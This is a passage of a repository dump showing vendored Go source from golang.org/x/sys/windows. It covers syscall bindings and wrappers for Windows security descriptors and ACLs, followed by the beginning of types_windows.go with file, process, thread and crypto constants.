getNamedSecurityInfo(objectName string, objectType SE_OBJECT_TYPE, securityInformation SECURITY_INFORMATION, owner **SID, group **SID, dacl **ACL, sacl **ACL, sd **SECURITY_DESCRIPTOR) (ret error) = advapi32.GetNamedSecurityInfoW 1108 | //sys SetNamedSecurityInfo(objectName string, objectType SE_OBJECT_TYPE, securityInformation SECURITY_INFORMATION, owner *SID, group *SID, dacl *ACL, sacl *ACL) (ret error) = advapi32.SetNamedSecurityInfoW 1109 | 1110 | //sys buildSecurityDescriptor(owner *TRUSTEE, group *TRUSTEE, countAccessEntries uint32, accessEntries *EXPLICIT_ACCESS, countAuditEntries uint32, auditEntries *EXPLICIT_ACCESS, oldSecurityDescriptor *SECURITY_DESCRIPTOR, sizeNewSecurityDescriptor *uint32, newSecurityDescriptor **SECURITY_DESCRIPTOR) (ret error) = advapi32.BuildSecurityDescriptorW 1111 | //sys initializeSecurityDescriptor(absoluteSD *SECURITY_DESCRIPTOR, revision uint32) (err error) = advapi32.InitializeSecurityDescriptor 1112 | 1113 | //sys getSecurityDescriptorControl(sd *SECURITY_DESCRIPTOR, control *SECURITY_DESCRIPTOR_CONTROL, revision *uint32) (err error) = advapi32.GetSecurityDescriptorControl 1114 | //sys getSecurityDescriptorDacl(sd *SECURITY_DESCRIPTOR, daclPresent *bool, dacl **ACL, daclDefaulted *bool) (err error) = advapi32.GetSecurityDescriptorDacl 1115 | //sys getSecurityDescriptorSacl(sd *SECURITY_DESCRIPTOR, saclPresent *bool, sacl **ACL, saclDefaulted *bool) (err error) = advapi32.GetSecurityDescriptorSacl 1116 | //sys getSecurityDescriptorOwner(sd *SECURITY_DESCRIPTOR, owner **SID, ownerDefaulted *bool) (err error) = advapi32.GetSecurityDescriptorOwner 1117 | //sys getSecurityDescriptorGroup(sd *SECURITY_DESCRIPTOR, group **SID, groupDefaulted *bool) (err error) = advapi32.GetSecurityDescriptorGroup 1118 | //sys getSecurityDescriptorLength(sd *SECURITY_DESCRIPTOR) (len uint32) = advapi32.GetSecurityDescriptorLength 1119 | //sys getSecurityDescriptorRMControl(sd *SECURITY_DESCRIPTOR, rmControl *uint8) (ret error) [failretval!=0] = advapi32.GetSecurityDescriptorRMControl 1120 | //sys isValidSecurityDescriptor(sd *SECURITY_DESCRIPTOR) (isValid bool) = advapi32.IsValidSecurityDescriptor 1121 | 1122 | //sys setSecurityDescriptorControl(sd *SECURITY_DESCRIPTOR, controlBitsOfInterest SECURITY_DESCRIPTOR_CONTROL, controlBitsToSet SECURITY_DESCRIPTOR_CONTROL) (err error) = advapi32.SetSecurityDescriptorControl 1123 | //sys setSecurityDescriptorDacl(sd *SECURITY_DESCRIPTOR, daclPresent bool, dacl *ACL, daclDefaulted bool) (err error) = advapi32.SetSecurityDescriptorDacl 1124 | //sys setSecurityDescriptorSacl(sd *SECURITY_DESCRIPTOR, saclPresent bool, sacl *ACL, saclDefaulted bool) (err error) = advapi32.SetSecurityDescriptorSacl 1125 | //sys setSecurityDescriptorOwner(sd *SECURITY_DESCRIPTOR, owner *SID, ownerDefaulted bool) (err error) = advapi32.SetSecurityDescriptorOwner 1126 | //sys setSecurityDescriptorGroup(sd *SECURITY_DESCRIPTOR, group *SID, groupDefaulted bool) (err error) = advapi32.SetSecurityDescriptorGroup 1127 | //sys setSecurityDescriptorRMControl(sd *SECURITY_DESCRIPTOR, rmControl *uint8) = advapi32.SetSecurityDescriptorRMControl 1128 | 1129 | //sys convertStringSecurityDescriptorToSecurityDescriptor(str string, revision uint32, sd **SECURITY_DESCRIPTOR, size *uint32) (err error) = advapi32.ConvertStringSecurityDescriptorToSecurityDescriptorW 1130 | //sys convertSecurityDescriptorToStringSecurityDescriptor(sd *SECURITY_DESCRIPTOR, revision uint32, securityInformation SECURITY_INFORMATION, str **uint16, strLen *uint32) (err error) = advapi32.ConvertSecurityDescriptorToStringSecurityDescriptorW 1131 | 1132 | //sys makeAbsoluteSD(selfRelativeSD *SECURITY_DESCRIPTOR, absoluteSD *SECURITY_DESCRIPTOR, absoluteSDSize *uint32, dacl *ACL, daclSize *uint32, sacl *ACL, saclSize *uint32, owner *SID, ownerSize *uint32, group *SID, groupSize *uint32) (err error) = advapi32.MakeAbsoluteSD 1133 | //sys makeSelfRelativeSD(absoluteSD *SECURITY_DESCRIPTOR, selfRelativeSD *SECURITY_DESCRIPTOR, selfRelativeSDSize *uint32) (err error) = advapi32.MakeSelfRelativeSD 1134 | 1135 | //sys setEntriesInAcl(countExplicitEntries uint32, explicitEntries *EXPLICIT_ACCESS, oldACL *ACL, newACL **ACL) (ret error) = advapi32.SetEntriesInAclW 1136 | 1137 | // Control returns the security descriptor control bits. 1138 | func (sd *SECURITY_DESCRIPTOR) Control() (control SECURITY_DESCRIPTOR_CONTROL, revision uint32, err error) { 1139 | err = getSecurityDescriptorControl(sd, &control, &revision) 1140 | return 1141 | } 1142 | 1143 | // SetControl sets the security descriptor control bits. 1144 | func (sd *SECURITY_DESCRIPTOR) SetControl(controlBitsOfInterest SECURITY_DESCRIPTOR_CONTROL, controlBitsToSet SECURITY_DESCRIPTOR_CONTROL) error { 1145 | return setSecurityDescriptorControl(sd, controlBitsOfInterest, controlBitsToSet) 1146 | } 1147 | 1148 | // RMControl returns the security descriptor resource manager control bits. 1149 | func (sd *SECURITY_DESCRIPTOR) RMControl() (control uint8, err error) { 1150 | err = getSecurityDescriptorRMControl(sd, &control) 1151 | return 1152 | } 1153 | 1154 | // SetRMControl sets the security descriptor resource manager control bits. 1155 | func (sd *SECURITY_DESCRIPTOR) SetRMControl(rmControl uint8) { 1156 | setSecurityDescriptorRMControl(sd, &rmControl) 1157 | } 1158 | 1159 | // DACL returns the security descriptor DACL and whether it was defaulted. The dacl return value may be nil 1160 | // if a DACL exists but is an "empty DACL", meaning fully permissive. If the DACL does not exist, err returns 1161 | // ERROR_OBJECT_NOT_FOUND. 1162 | func (sd *SECURITY_DESCRIPTOR) DACL() (dacl *ACL, defaulted bool, err error) { 1163 | var present bool 1164 | err = getSecurityDescriptorDacl(sd, &present, &dacl, &defaulted) 1165 | if !present { 1166 | err = ERROR_OBJECT_NOT_FOUND 1167 | } 1168 | return 1169 | } 1170 | 1171 | // SetDACL sets the absolute security descriptor DACL. 1172 | func (absoluteSD *SECURITY_DESCRIPTOR) SetDACL(dacl *ACL, present, defaulted bool) error { 1173 | return setSecurityDescriptorDacl(absoluteSD, present, dacl, defaulted) 1174 | } 1175 | 1176 | // SACL returns the security descriptor SACL and whether it was defaulted. The sacl return value may be nil 1177 | // if a SACL exists but is an "empty SACL", meaning fully permissive. If the SACL does not exist, err returns 1178 | // ERROR_OBJECT_NOT_FOUND. 1179 | func (sd *SECURITY_DESCRIPTOR) SACL() (sacl *ACL, defaulted bool, err error) { 1180 | var present bool 1181 | err = getSecurityDescriptorSacl(sd, &present, &sacl, &defaulted) 1182 | if !present { 1183 | err = ERROR_OBJECT_NOT_FOUND 1184 | } 1185 | return 1186 | } 1187 | 1188 | // SetSACL sets the absolute security descriptor SACL. 1189 | func (absoluteSD *SECURITY_DESCRIPTOR) SetSACL(sacl *ACL, present, defaulted bool) error { 1190 | return setSecurityDescriptorSacl(absoluteSD, present, sacl, defaulted) 1191 | } 1192 | 1193 | // Owner returns the security descriptor owner and whether it was defaulted. 1194 | func (sd *SECURITY_DESCRIPTOR) Owner() (owner *SID, defaulted bool, err error) { 1195 | err = getSecurityDescriptorOwner(sd, &owner, &defaulted) 1196 | return 1197 | } 1198 | 1199 | // SetOwner sets the absolute security descriptor owner. 1200 | func (absoluteSD *SECURITY_DESCRIPTOR) SetOwner(owner *SID, defaulted bool) error { 1201 | return setSecurityDescriptorOwner(absoluteSD, owner, defaulted) 1202 | } 1203 | 1204 | // Group returns the security descriptor group and whether it was defaulted. 1205 | func (sd *SECURITY_DESCRIPTOR) Group() (group *SID, defaulted bool, err error) { 1206 | err = getSecurityDescriptorGroup(sd, &group, &defaulted) 1207 | return 1208 | } 1209 | 1210 | // SetGroup sets the absolute security descriptor owner. 1211 | func (absoluteSD *SECURITY_DESCRIPTOR) SetGroup(group *SID, defaulted bool) error { 1212 | return setSecurityDescriptorGroup(absoluteSD, group, defaulted) 1213 | } 1214 | 1215 | // Length returns the length of the security descriptor. 1216 | func (sd *SECURITY_DESCRIPTOR) Length() uint32 { 1217 | return getSecurityDescriptorLength(sd) 1218 | } 1219 | 1220 | // IsValid returns whether the security descriptor is valid. 1221 | func (sd *SECURITY_DESCRIPTOR) IsValid() bool { 1222 | return isValidSecurityDescriptor(sd) 1223 | } 1224 | 1225 | // String returns the SDDL form of the security descriptor, with a function signature that can be 1226 | // used with %v formatting directives. 1227 | func (sd *SECURITY_DESCRIPTOR) String() string { 1228 | var sddl *uint16 1229 | err := convertSecurityDescriptorToStringSecurityDescriptor(sd, 1, 0xff, &sddl, nil) 1230 | if err != nil { 1231 | return "" 1232 | } 1233 | defer LocalFree(Handle(unsafe.Pointer(sddl))) 1234 | return UTF16PtrToString(sddl) 1235 | } 1236 | 1237 | // ToAbsolute converts a self-relative security descriptor into an absolute one. 1238 | func (selfRelativeSD *SECURITY_DESCRIPTOR) ToAbsolute() (absoluteSD *SECURITY_DESCRIPTOR, err error) { 1239 | control, _, err := selfRelativeSD.Control() 1240 | if err != nil { 1241 | return 1242 | } 1243 | if control&SE_SELF_RELATIVE == 0 { 1244 | err = ERROR_INVALID_PARAMETER 1245 | return 1246 | } 1247 | var absoluteSDSize, daclSize, saclSize, ownerSize, groupSize uint32 1248 | err = makeAbsoluteSD(selfRelativeSD, nil, &absoluteSDSize, 1249 | nil, &daclSize, nil, &saclSize, nil, &ownerSize, nil, &groupSize) 1250 | switch err { 1251 | case ERROR_INSUFFICIENT_BUFFER: 1252 | case nil: 1253 | // makeAbsoluteSD is expected to fail, but it succeeds. 1254 | return nil, ERROR_INTERNAL_ERROR 1255 | default: 1256 | return nil, err 1257 | } 1258 | if absoluteSDSize > 0 { 1259 | absoluteSD = (*SECURITY_DESCRIPTOR)(unsafe.Pointer(&make([]byte, absoluteSDSize)[0])) 1260 | } 1261 | var ( 1262 | dacl *ACL 1263 | sacl *ACL 1264 | owner *SID 1265 | group *SID 1266 | ) 1267 | if daclSize > 0 { 1268 | dacl = (*ACL)(unsafe.Pointer(&make([]byte, daclSize)[0])) 1269 | } 1270 | if saclSize > 0 { 1271 | sacl = (*ACL)(unsafe.Pointer(&make([]byte, saclSize)[0])) 1272 | } 1273 | if ownerSize > 0 { 1274 | owner = (*SID)(unsafe.Pointer(&make([]byte, ownerSize)[0])) 1275 | } 1276 | if groupSize > 0 { 1277 | group = (*SID)(unsafe.Pointer(&make([]byte, groupSize)[0])) 1278 | } 1279 | err = makeAbsoluteSD(selfRelativeSD, absoluteSD, &absoluteSDSize, 1280 | dacl, &daclSize, sacl, &saclSize, owner, &ownerSize, group, &groupSize) 1281 | return 1282 | } 1283 | 1284 | // ToSelfRelative converts an absolute security descriptor into a self-relative one. 1285 | func (absoluteSD *SECURITY_DESCRIPTOR) ToSelfRelative() (selfRelativeSD *SECURITY_DESCRIPTOR, err error) { 1286 | control, _, err := absoluteSD.Control() 1287 | if err != nil { 1288 | return 1289 | } 1290 | if control&SE_SELF_RELATIVE != 0 { 1291 | err = ERROR_INVALID_PARAMETER 1292 | return 1293 | } 1294 | var selfRelativeSDSize uint32 1295 | err = makeSelfRelativeSD(absoluteSD, nil, &selfRelativeSDSize) 1296 | switch err { 1297 | case ERROR_INSUFFICIENT_BUFFER: 1298 | case nil: 1299 | // makeSelfRelativeSD is expected to fail, but it succeeds. 1300 | return nil, ERROR_INTERNAL_ERROR 1301 | default: 1302 | return nil, err 1303 | } 1304 | if selfRelativeSDSize > 0 { 1305 | selfRelativeSD = (*SECURITY_DESCRIPTOR)(unsafe.Pointer(&make([]byte, selfRelativeSDSize)[0])) 1306 | } 1307 | err = makeSelfRelativeSD(absoluteSD, selfRelativeSD, &selfRelativeSDSize) 1308 | return 1309 | } 1310 | 1311 | func (selfRelativeSD *SECURITY_DESCRIPTOR) copySelfRelativeSecurityDescriptor() *SECURITY_DESCRIPTOR { 1312 | sdLen := (int)(selfRelativeSD.Length()) 1313 | 1314 | var src []byte 1315 | h := (*unsafeheader.Slice)(unsafe.Pointer(&src)) 1316 | h.Data = unsafe.Pointer(selfRelativeSD) 1317 | h.Len = sdLen 1318 | h.Cap = sdLen 1319 | 1320 | dst := make([]byte, sdLen) 1321 | copy(dst, src) 1322 | return (*SECURITY_DESCRIPTOR)(unsafe.Pointer(&dst[0])) 1323 | } 1324 | 1325 | // SecurityDescriptorFromString converts an SDDL string describing a security descriptor into a 1326 | // self-relative security descriptor object allocated on the Go heap. 1327 | func SecurityDescriptorFromString(sddl string) (sd *SECURITY_DESCRIPTOR, err error) { 1328 | var winHeapSD *SECURITY_DESCRIPTOR 1329 | err = convertStringSecurityDescriptorToSecurityDescriptor(sddl, 1, &winHeapSD, nil) 1330 | if err != nil { 1331 | return 1332 | } 1333 | defer LocalFree(Handle(unsafe.Pointer(winHeapSD))) 1334 | return winHeapSD.copySelfRelativeSecurityDescriptor(), nil 1335 | } 1336 | 1337 | // GetSecurityInfo queries the security information for a given handle and returns the self-relative security 1338 | // descriptor result on the Go heap. 1339 | func GetSecurityInfo(handle Handle, objectType SE_OBJECT_TYPE, securityInformation SECURITY_INFORMATION) (sd *SECURITY_DESCRIPTOR, err error) { 1340 | var winHeapSD *SECURITY_DESCRIPTOR 1341 | err = getSecurityInfo(handle, objectType, securityInformation, nil, nil, nil, nil, &winHeapSD) 1342 | if err != nil { 1343 | return 1344 | } 1345 | defer LocalFree(Handle(unsafe.Pointer(winHeapSD))) 1346 | return winHeapSD.copySelfRelativeSecurityDescriptor(), nil 1347 | } 1348 | 1349 | // GetNamedSecurityInfo queries the security information for a given named object and returns the self-relative security 1350 | // descriptor result on the Go heap. 1351 | func GetNamedSecurityInfo(objectName string, objectType SE_OBJECT_TYPE, securityInformation SECURITY_INFORMATION) (sd *SECURITY_DESCRIPTOR, err error) { 1352 | var winHeapSD *SECURITY_DESCRIPTOR 1353 | err = getNamedSecurityInfo(objectName, objectType, securityInformation, nil, nil, nil, nil, &winHeapSD) 1354 | if err != nil { 1355 | return 1356 | } 1357 | defer LocalFree(Handle(unsafe.Pointer(winHeapSD))) 1358 | return winHeapSD.copySelfRelativeSecurityDescriptor(), nil 1359 | } 1360 | 1361 | // BuildSecurityDescriptor makes a new security descriptor using the input trustees, explicit access lists, and 1362 | // prior security descriptor to be merged, any of which can be nil, returning the self-relative security descriptor 1363 | // result on the Go heap. 1364 | func BuildSecurityDescriptor(owner *TRUSTEE, group *TRUSTEE, accessEntries []EXPLICIT_ACCESS, auditEntries []EXPLICIT_ACCESS, mergedSecurityDescriptor *SECURITY_DESCRIPTOR) (sd *SECURITY_DESCRIPTOR, err error) { 1365 | var winHeapSD *SECURITY_DESCRIPTOR 1366 | var winHeapSDSize uint32 1367 | var firstAccessEntry *EXPLICIT_ACCESS 1368 | if len(accessEntries) > 0 { 1369 | firstAccessEntry = &accessEntries[0] 1370 | } 1371 | var firstAuditEntry *EXPLICIT_ACCESS 1372 | if len(auditEntries) > 0 { 1373 | firstAuditEntry = &auditEntries[0] 1374 | } 1375 | err = buildSecurityDescriptor(owner, group, uint32(len(accessEntries)), firstAccessEntry, uint32(len(auditEntries)), firstAuditEntry, mergedSecurityDescriptor, &winHeapSDSize, &winHeapSD) 1376 | if err != nil { 1377 | return 1378 | } 1379 | defer LocalFree(Handle(unsafe.Pointer(winHeapSD))) 1380 | return winHeapSD.copySelfRelativeSecurityDescriptor(), nil 1381 | } 1382 | 1383 | // NewSecurityDescriptor creates and initializes a new absolute security descriptor. 1384 | func NewSecurityDescriptor() (absoluteSD *SECURITY_DESCRIPTOR, err error) { 1385 | absoluteSD = &SECURITY_DESCRIPTOR{} 1386 | err = initializeSecurityDescriptor(absoluteSD, 1) 1387 | return 1388 | } 1389 | 1390 | // ACLFromEntries returns a new ACL on the Go heap containing a list of explicit entries as well as those of another ACL. 1391 | // Both explicitEntries and mergedACL are optional and can be nil. 1392 | func ACLFromEntries(explicitEntries []EXPLICIT_ACCESS, mergedACL *ACL) (acl *ACL, err error) { 1393 | var firstExplicitEntry *EXPLICIT_ACCESS 1394 | if len(explicitEntries) > 0 { 1395 | firstExplicitEntry = &explicitEntries[0] 1396 | } 1397 | var winHeapACL *ACL 1398 | err = setEntriesInAcl(uint32(len(explicitEntries)), firstExplicitEntry, mergedACL, &winHeapACL) 1399 | if err != nil { 1400 | return 1401 | } 1402 | defer LocalFree(Handle(unsafe.Pointer(winHeapACL))) 1403 | aclBytes := make([]byte, winHeapACL.aclSize) 1404 | copy(aclBytes, (*[(1 << 31) - 1]byte)(unsafe.Pointer(winHeapACL))[:len(aclBytes):len(aclBytes)]) 1405 | return (*ACL)(unsafe.Pointer(&aclBytes[0])), nil 1406 | } 1407 | -------------------------------------------------------------------------------- /vendor/golang.org/x/sys/windows/types_windows.go: -------------------------------------------------------------------------------- 1 | // Copyright 2011 The Go Authors. All rights reserved. 2 | // Use of this source code is governed by a BSD-style 3 | // license that can be found in the LICENSE file. 4 | 5 | package windows 6 | 7 | import ( 8 | "net" 9 | "syscall" 10 | "unsafe" 11 | ) 12 | 13 | const ( 14 | // Invented values to support what package os expects. 15 | O_RDONLY = 0x00000 16 | O_WRONLY = 0x00001 17 | O_RDWR = 0x00002 18 | O_CREAT = 0x00040 19 | O_EXCL = 0x00080 20 | O_NOCTTY = 0x00100 21 | O_TRUNC = 0x00200 22 | O_NONBLOCK = 0x00800 23 | O_APPEND = 0x00400 24 | O_SYNC = 0x01000 25 | O_ASYNC = 0x02000 26 | O_CLOEXEC = 0x80000 27 | ) 28 | 29 | const ( 30 | // More invented values for signals 31 | SIGHUP = Signal(0x1) 32 | SIGINT = Signal(0x2) 33 | SIGQUIT = Signal(0x3) 34 | SIGILL = Signal(0x4) 35 | SIGTRAP = Signal(0x5) 36 | SIGABRT = Signal(0x6) 37 | SIGBUS = Signal(0x7) 38 | SIGFPE = Signal(0x8) 39 | SIGKILL = Signal(0x9) 40 | SIGSEGV = Signal(0xb) 41 | SIGPIPE = Signal(0xd) 42 | SIGALRM = Signal(0xe) 43 | SIGTERM = Signal(0xf) 44 | ) 45 | 46 | var signals = [...]string{ 47 | 1: "hangup", 48 | 2: "interrupt", 49 | 3: "quit", 50 | 4: "illegal instruction", 51 | 5: "trace/breakpoint trap", 52 | 6: "aborted", 53 | 7: "bus error", 54 | 8: "floating point exception", 55 | 9: "killed", 56 | 10: "user defined signal 1", 57 | 11: "segmentation fault", 58 | 12: "user defined signal 2", 59 | 13: "broken pipe", 60 | 14: "alarm clock", 61 | 15: "terminated", 62 | } 63 | 64 | const ( 65 | FILE_LIST_DIRECTORY = 0x00000001 66 | FILE_APPEND_DATA = 0x00000004 67 | FILE_WRITE_ATTRIBUTES = 0x00000100 68 | 69 | FILE_SHARE_READ = 0x00000001 70 | FILE_SHARE_WRITE = 0x00000002 71 | FILE_SHARE_DELETE = 0x00000004 72 | 73 | FILE_ATTRIBUTE_READONLY = 0x00000001 74 | FILE_ATTRIBUTE_HIDDEN = 0x00000002 75 | FILE_ATTRIBUTE_SYSTEM = 0x00000004 76 | FILE_ATTRIBUTE_DIRECTORY = 0x00000010 77 | FILE_ATTRIBUTE_ARCHIVE = 0x00000020 78 | FILE_ATTRIBUTE_DEVICE = 0x00000040 79 | FILE_ATTRIBUTE_NORMAL = 0x00000080 80 | FILE_ATTRIBUTE_TEMPORARY = 0x00000100 81 | FILE_ATTRIBUTE_SPARSE_FILE = 0x00000200 82 | FILE_ATTRIBUTE_REPARSE_POINT = 0x00000400 83 | FILE_ATTRIBUTE_COMPRESSED = 0x00000800 84 | FILE_ATTRIBUTE_OFFLINE = 0x00001000 85 | FILE_ATTRIBUTE_NOT_CONTENT_INDEXED = 0x00002000 86 | FILE_ATTRIBUTE_ENCRYPTED = 0x00004000 87 | FILE_ATTRIBUTE_INTEGRITY_STREAM = 0x00008000 88 | FILE_ATTRIBUTE_VIRTUAL = 0x00010000 89 | FILE_ATTRIBUTE_NO_SCRUB_DATA = 0x00020000 90 | FILE_ATTRIBUTE_RECALL_ON_OPEN = 0x00040000 91 | FILE_ATTRIBUTE_RECALL_ON_DATA_ACCESS = 0x00400000 92 | 93 | INVALID_FILE_ATTRIBUTES = 0xffffffff 94 | 95 | CREATE_NEW = 1 96 | CREATE_ALWAYS = 2 97 | OPEN_EXISTING = 3 98 | OPEN_ALWAYS = 4 99 | TRUNCATE_EXISTING = 5 100 | 101 | FILE_FLAG_OPEN_REQUIRING_OPLOCK = 0x00040000 102 | FILE_FLAG_FIRST_PIPE_INSTANCE = 0x00080000 103 | FILE_FLAG_OPEN_NO_RECALL = 0x00100000 104 | FILE_FLAG_OPEN_REPARSE_POINT = 0x00200000 105 | FILE_FLAG_SESSION_AWARE = 0x00800000 106 | FILE_FLAG_POSIX_SEMANTICS = 0x01000000 107 | FILE_FLAG_BACKUP_SEMANTICS = 0x02000000 108 | FILE_FLAG_DELETE_ON_CLOSE = 0x04000000 109 | FILE_FLAG_SEQUENTIAL_SCAN = 0x08000000 110 | FILE_FLAG_RANDOM_ACCESS = 0x10000000 111 | FILE_FLAG_NO_BUFFERING = 0x20000000 112 | FILE_FLAG_OVERLAPPED = 0x40000000 113 | FILE_FLAG_WRITE_THROUGH = 0x80000000 114 | 115 | HANDLE_FLAG_INHERIT = 0x00000001 116 | STARTF_USESTDHANDLES = 0x00000100 117 | STARTF_USESHOWWINDOW = 0x00000001 118 | DUPLICATE_CLOSE_SOURCE = 0x00000001 119 | DUPLICATE_SAME_ACCESS = 0x00000002 120 | 121 | STD_INPUT_HANDLE = -10 & (1<<32 - 1) 122 | STD_OUTPUT_HANDLE = -11 & (1<<32 - 1) 123 | STD_ERROR_HANDLE = -12 & (1<<32 - 1) 124 | 125 | FILE_BEGIN = 0 126 | FILE_CURRENT = 1 127 | FILE_END = 2 128 | 129 | LANG_ENGLISH = 0x09 130 | SUBLANG_ENGLISH_US = 0x01 131 | 132 | FORMAT_MESSAGE_ALLOCATE_BUFFER = 256 133 | FORMAT_MESSAGE_IGNORE_INSERTS = 512 134 | FORMAT_MESSAGE_FROM_STRING = 1024 135 | FORMAT_MESSAGE_FROM_HMODULE = 2048 136 | FORMAT_MESSAGE_FROM_SYSTEM = 4096 137 | FORMAT_MESSAGE_ARGUMENT_ARRAY = 8192 138 | FORMAT_MESSAGE_MAX_WIDTH_MASK = 255 139 | 140 | MAX_PATH = 260 141 | MAX_LONG_PATH = 32768 142 | 143 | MAX_COMPUTERNAME_LENGTH = 15 144 | 145 | TIME_ZONE_ID_UNKNOWN = 0 146 | TIME_ZONE_ID_STANDARD = 1 147 | 148 | TIME_ZONE_ID_DAYLIGHT = 2 149 | IGNORE = 0 150 | INFINITE = 0xffffffff 151 | 152 | WAIT_ABANDONED = 0x00000080 153 | WAIT_OBJECT_0 = 0x00000000 154 | WAIT_FAILED = 0xFFFFFFFF 155 | 156 | // Access rights for process. 157 | PROCESS_CREATE_PROCESS = 0x0080 158 | PROCESS_CREATE_THREAD = 0x0002 159 | PROCESS_DUP_HANDLE = 0x0040 160 | PROCESS_QUERY_INFORMATION = 0x0400 161 | PROCESS_QUERY_LIMITED_INFORMATION = 0x1000 162 | PROCESS_SET_INFORMATION = 0x0200 163 | PROCESS_SET_QUOTA = 0x0100 164 | PROCESS_SUSPEND_RESUME = 0x0800 165 | PROCESS_TERMINATE = 0x0001 166 | PROCESS_VM_OPERATION = 0x0008 167 | PROCESS_VM_READ = 0x0010 168 | PROCESS_VM_WRITE = 0x0020 169 | 170 | // Access rights for thread. 171 | THREAD_DIRECT_IMPERSONATION = 0x0200 172 | THREAD_GET_CONTEXT = 0x0008 173 | THREAD_IMPERSONATE = 0x0100 174 | THREAD_QUERY_INFORMATION = 0x0040 175 | THREAD_QUERY_LIMITED_INFORMATION = 0x0800 176 | THREAD_SET_CONTEXT = 0x0010 177 | THREAD_SET_INFORMATION = 0x0020 178 | THREAD_SET_LIMITED_INFORMATION = 0x0400 179 | THREAD_SET_THREAD_TOKEN = 0x0080 180 | THREAD_SUSPEND_RESUME = 0x0002 181 | THREAD_TERMINATE = 0x0001 182 | 183 | FILE_MAP_COPY = 0x01 184 | FILE_MAP_WRITE = 0x02 185 | FILE_MAP_READ = 0x04 186 | FILE_MAP_EXECUTE = 0x20 187 | 188 | CTRL_C_EVENT = 0 189 | CTRL_BREAK_EVENT = 1 190 | CTRL_CLOSE_EVENT = 2 191 | CTRL_LOGOFF_EVENT = 5 192 | CTRL_SHUTDOWN_EVENT = 6 193 | 194 | // Windows reserves errors >= 1<<29 for application use. 195 | APPLICATION_ERROR = 1 << 29 196 | ) 197 | 198 | const ( 199 | // Process creation flags. 200 | CREATE_BREAKAWAY_FROM_JOB = 0x01000000 201 | CREATE_DEFAULT_ERROR_MODE = 0x04000000 202 | CREATE_NEW_CONSOLE = 0x00000010 203 | CREATE_NEW_PROCESS_GROUP = 0x00000200 204 | CREATE_NO_WINDOW = 0x08000000 205 | CREATE_PROTECTED_PROCESS = 0x00040000 206 | CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000 207 | CREATE_SEPARATE_WOW_VDM = 0x00000800 208 | CREATE_SHARED_WOW_VDM = 0x00001000 209 | CREATE_SUSPENDED = 0x00000004 210 | CREATE_UNICODE_ENVIRONMENT = 0x00000400 211 | DEBUG_ONLY_THIS_PROCESS = 0x00000002 212 | DEBUG_PROCESS = 0x00000001 213 | DETACHED_PROCESS = 0x00000008 214 | EXTENDED_STARTUPINFO_PRESENT = 0x00080000 215 | INHERIT_PARENT_AFFINITY = 0x00010000 216 | ) 217 | 218 | const ( 219 | // flags for CreateToolhelp32Snapshot 220 | TH32CS_SNAPHEAPLIST = 0x01 221 | TH32CS_SNAPPROCESS = 0x02 222 | TH32CS_SNAPTHREAD = 0x04 223 | TH32CS_SNAPMODULE = 0x08 224 | TH32CS_SNAPMODULE32 = 0x10 225 | TH32CS_SNAPALL = TH32CS_SNAPHEAPLIST | TH32CS_SNAPMODULE | TH32CS_SNAPPROCESS | TH32CS_SNAPTHREAD 226 | TH32CS_INHERIT = 0x80000000 227 | ) 228 | 229 | const ( 230 | // filters for ReadDirectoryChangesW 231 | FILE_NOTIFY_CHANGE_FILE_NAME = 0x001 232 | FILE_NOTIFY_CHANGE_DIR_NAME = 0x002 233 | FILE_NOTIFY_CHANGE_ATTRIBUTES = 0x004 234 | FILE_NOTIFY_CHANGE_SIZE = 0x008 235 | FILE_NOTIFY_CHANGE_LAST_WRITE = 0x010 236 | FILE_NOTIFY_CHANGE_LAST_ACCESS = 0x020 237 | FILE_NOTIFY_CHANGE_CREATION = 0x040 238 | FILE_NOTIFY_CHANGE_SECURITY = 0x100 239 | ) 240 | 241 | const ( 242 | // do not reorder 243 | FILE_ACTION_ADDED = iota + 1 244 | FILE_ACTION_REMOVED 245 | FILE_ACTION_MODIFIED 246 | FILE_ACTION_RENAMED_OLD_NAME 247 | FILE_ACTION_RENAMED_NEW_NAME 248 | ) 249 | 250 | const ( 251 | // wincrypt.h 252 | PROV_RSA_FULL = 1 253 | PROV_RSA_SIG = 2 254 | PROV_DSS = 3 255 | PROV_FORTEZZA = 4 256 | PROV_MS_EXCHANGE = 5 257 | PROV_SSL = 6 258 | PROV_RSA_SCHANNEL = 12 259 | PROV_DSS_DH = 13 260 | PROV_EC_ECDSA_SIG = 14 261 | PROV_EC_ECNRA_SIG = 15 262 | PROV_EC_ECDSA_FULL = 16 263 | PROV_EC_ECNRA_FULL = 17 264 | PROV_DH_SCHANNEL = 18 265 | PROV_SPYRUS_LYNKS = 20 266 | PROV_RNG = 21 267 | PROV_INTEL_SEC = 22 268 | PROV_REPLACE_OWF = 23 269 | PROV_RSA_AES = 24 270 | CRYPT_VERIFYCONTEXT = 0xF0000000 271 | CRYPT_NEWKEYSET = 0x00000008 272 | CRYPT_DELETEKEYSET = 0x00000010 273 | CRYPT_MACHINE_KEYSET = 0x00000020 274 | CRYPT_SILENT = 0x00000040 275 | CRYPT_DEFAULT_CONTAINER_OPTIONAL = 0x00000080 276 | 277 | USAGE_MATCH_TYPE_AND = 0 278 | USAGE_MATCH_TYPE_OR = 1 279 | 280 | /* msgAndCertEncodingType values for CertOpenStore function */ 281 | X509_ASN_ENCODING = 0x00000001 282 | PKCS_7_ASN_ENCODING = 0x00010000 283 | 284 | /* storeProvider values for CertOpenStore function */ 285 | CERT_STORE_PROV_MSG = 1 286 | CERT_STORE_PROV_MEMORY = 2 287 | CERT_STORE_PROV_FILE = 3 288 | CERT_STORE_PROV_REG = 4 289 | CERT_STORE_PROV_PKCS7 = 5 290 | CERT_STORE_PROV_SERIALIZED = 6 291 | CERT_STORE_PROV_FILENAME_A = 7 292 | CERT_STORE_PROV_FILENAME_W = 8 293 | CERT_STORE_PROV_FILENAME = CERT_STORE_PROV_FILENAME_W 294 | CERT_STORE_PROV_SYSTEM_A = 9 295 | CERT_STORE_PROV_SYSTEM_W = 10 296 | CERT_STORE_PROV_SYSTEM = CERT_STORE_PROV_SYSTEM_W 297 | CERT_STORE_PROV_COLLECTION = 11 298 | CERT_STORE_PROV_SYSTEM_REGISTRY_A = 12 299 | CERT_STORE_PROV_SYSTEM_REGISTRY_W = 13 300 | CERT_STORE_PROV_SYSTEM_REGISTRY = CERT_STORE_PROV_SYSTEM_REGISTRY_W 301 | CERT_STORE_PROV_PHYSICAL_W = 14 302 | CERT_STORE_PROV_PHYSICAL = CERT_STORE_PROV_PHYSICAL_W 303 | CERT_STORE_PROV_SMART_CARD_W = 15 304 | CERT_STORE_PROV_SMART_CARD = 